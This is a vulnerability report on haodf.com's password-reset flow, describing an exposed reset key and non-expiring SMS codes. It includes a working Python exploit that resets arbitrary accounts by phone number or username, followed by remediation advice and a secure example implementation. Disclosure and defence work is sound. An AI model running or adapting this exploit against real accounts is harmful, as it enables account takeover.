1. Reset via phone number: http://passport.haodf.com/user/resetpassword

Through this URL, a password can be recovered by email or by phone number. When the phone-number option is chosen, the page redirects to the following address, which asks for the username and the SMS verification code: http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx

At this point the username appears directly in the browser address bar, and the verification code can be bypassed. (By the way, the SMS verification code can be reused repeatedly and does not seem to expire for a very long time.) Viewing the page source reveals

<input name="key" type="hidden" id="key" value="DE4rXvQaMCGXBC3UMxQRXXXXXXXXNCEnO8iGq8jhOf0b" />

This key is the one used to reset the password. Construct a POST request to http://passport.haodf.com/user/confirmpassword with the body

password=123123&confirmPassword=123123&key=XXXXXX

and that user's password is reset.

2. Reset via username: the site does not offer this feature itself, but entering through the intermediate URL above allows a reset by username alone: http://passport.haodf.com/user/sendpasswordsucc?type=mobile&username=xxxxxxx
3. Reset via email: the same as the phone-number reset in item 1.

A simple EXP written in Python (Python 2, urllib2) is attached:

#encoding=utf8
import urllib2

username = 'init'


class MyHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
    # The phone-number flow redirects to sendpasswordsucc?...&username=...;
    # read the username out of the Location header while the redirect is followed.
    def http_error_302(self, req, fp, code, msg, httpmsg):
        for header in httpmsg.headers:
            if header.count('username=') > 0:
                global username
                username = header[header.index('username=') + 9:header.index('\r\n')]
        return urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, httpmsg)


def ResetByPhone(phone):
    resetpwd_url = 'http://passport.haodf.com/user/resetpassword'
    submit_url = 'http://passport.haodf.com/user/confirmpassword'

    # POST the phone number; the returned page carries the hidden reset key.
    req = urllib2.Request(resetpwd_url, 'input=%s' % phone)
    opener = urllib2.build_opener(MyHTTPRedirectHandler)
    response = opener.open(req)
    the_page = response.read()
    # 16 characters skip past 'id="key" value="'.
    key = the_page[the_page.index('id="key"') + 16:]
    key = key[:key.index('"')]

    # Submit the new password together with the key.
    req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (phone, phone, key))
    response = urllib2.urlopen(req)
    #print response.read()


def ResetByUsername(uname):
    resetpwd_url = 'http://passport.haodf.com/user/sendpasswordsucc'
    submit_url = 'http://passport.haodf.com/user/confirmpassword'

    # POST the username straight to the intermediate page; it also carries the key.
    req = urllib2.Request(resetpwd_url, 'type=mobile&username=%s' % uname)
    response = urllib2.urlopen(req)
    the_page = response.read()
    key = the_page[the_page.index('id="key"') + 16:]
    key = key[:key.index('"')]

    req = urllib2.Request(submit_url, 'password=%s&confirmPassword=%s&key=%s' % (uname, uname, key))
    response = urllib2.urlopen(req)
    #print response.read()


ResetByPhone('13912341234')
ResetByUsername('testuser')
Remediation: hide the key (do not expose it to the client); add an expiry mechanism for the verification code.
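As an added example (not haodf.com's code and not part of the original report), the following Python sketch shows a server-side reset flow that applies both remediation points: no reset key ever reaches the client before the SMS code has been checked, and every code and reset token expires and is consumed on first use. The class and function names, the TTL values, the guess limit and the in-memory dictionaries are assumptions made for the illustration; a real service would back them with a database or cache.

```python
"""Minimal password-reset flow illustrating the fixes above (added example).

Assumed names: ResetService, send_code, verify_code, confirm_password.
Assumed values: 5-minute code lifetime, 10-minute token lifetime, 5 guesses.
"""
import hashlib
import hmac
import secrets
import time

CODE_TTL_SECONDS = 5 * 60      # SMS code lifetime (assumed value)
TOKEN_TTL_SECONDS = 10 * 60    # reset-token lifetime (assumed value)
MAX_CODE_ATTEMPTS = 5          # wrong guesses before a fresh code is required


def _h(token):
    """Hash tokens before storing them so a leaked store yields nothing usable."""
    return hashlib.sha256(token.encode()).hexdigest()


class ResetService:
    def __init__(self, clock=time.time):
        self._clock = clock      # injectable clock so expiry can be exercised offline
        self._codes = {}         # username -> (code, expires_at, attempts_left)
        self._tokens = {}        # sha256(token) -> (username, expires_at)

    def send_code(self, username):
        """Issue a one-time SMS code. It is returned only for hand-off to the
        SMS gateway and must never be written into the page the browser sees."""
        code = "%06d" % secrets.randbelow(10 ** 6)
        self._codes[username] = (code, self._clock() + CODE_TTL_SECONDS, MAX_CODE_ATTEMPTS)
        return code

    def verify_code(self, username, code):
        """Exchange a valid, unexpired SMS code for a reset token.

        The reset key is created here, after the code has been checked, so it
        cannot be scraped from the page beforehand. Returns None on failure."""
        entry = self._codes.get(username)
        if entry is None:
            return None
        stored, expires_at, attempts_left = entry
        if self._clock() > expires_at:
            del self._codes[username]          # expired: force a fresh code
            return None
        if not hmac.compare_digest(stored, code):
            attempts_left -= 1
            if attempts_left <= 0:
                del self._codes[username]      # too many guesses: force a fresh code
            else:
                self._codes[username] = (stored, expires_at, attempts_left)
            return None
        del self._codes[username]              # single use: the code cannot be replayed
        token = secrets.token_urlsafe(32)
        self._tokens[_h(token)] = (username, self._clock() + TOKEN_TTL_SECONDS)
        return token

    def confirm_password(self, token, password, confirm_password):
        """Consume the reset token and return the username whose password is
        being changed, or None if the token is unknown, expired or already used."""
        if password != confirm_password:
            return None                        # token is left intact for a retry
        entry = self._tokens.pop(_h(token), None)   # single use
        if entry is None:
            return None
        username, expires_at = entry
        if self._clock() > expires_at:
            return None
        return username


if __name__ == "__main__":
    svc = ResetService()
    code = svc.send_code("demo-user")          # constructed sample account
    token = svc.verify_code("demo-user", code)
    print("reset allowed for:", svc.confirm_password(token, "new-pass", "new-pass"))
    print("replayed token:", svc.confirm_password(token, "new-pass", "new-pass"))
```

The contrast with the reported behaviour is the ordering: the vulnerable flow hands out the key before the code is verified and never expires the code, whereas here the token only exists once the code has matched, and both the code and the token are deleted the moment they are used or time out.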